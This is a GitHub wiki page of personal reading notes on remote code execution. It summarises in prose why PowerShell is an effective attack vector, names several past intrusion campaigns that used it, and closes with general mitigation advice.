Remote Code Execution (RCE) - Salem73616C656D/reading-notes GitHub Wiki
Key Takeaways
Why Is PowerShell An Effective Attack Vector
Virus-infected files and malicious trojans are established malware types, and developers have various defensive detection and mitigation techniques to defend against them. Browsers verify downloaded files; applications need approved permissions before installation; and security software can scan files to be written, read, and/or executed to check for known signatures. Even malware delivered via Microsoft Office macros are obstructed by default settings that no longer allow automatic execution.
Prominent Attacks And Infections Using PS
As the resources for using and abusing PowerShell are easily available online, malicious actors of varying degrees of sophistication have emerged. Since the first reports in 2014, threat actors have deployed campaigns using social engineering techniques to infect systems, combining PowerShell with other exploits or seemingly replicating other routines as a part of cybercriminal research and development.
One of the most infamous compromises using the PowerShell for intrusion was linked to the release of internal emails from the Democratic National Committee by adversary group Pawn Storm in 2016. While discovered in the said year, forensic investigation of the network showed initial compromise as far back as 2015 with a backdoor delivered by a single PowerShell command, while other deployments that matched the routine began as early as 2014. The Equifax breach in 2017 demonstrated the depth and extent of damage that malicious actors can cause, using PowerShell to exploit an unpatched vulnerability. In 2018, another cyberespionage group, APT33, sent spear phishing emails targeting the aviation and oil industries; the attachment executed a PowerShell command that downloaded malware and established persistence inside the company’s network.
Mitigations And Best Practices
With administrators busy securing and maintaining all systems running onsite and remotely, the addition of fileless threats can be overwhelming for manual security operations and inexperienced personnel. But being able to track its activities, finding the deobfuscated events and payloads, monitoring, and getting used to their behaviors are skills that can be learned and developed.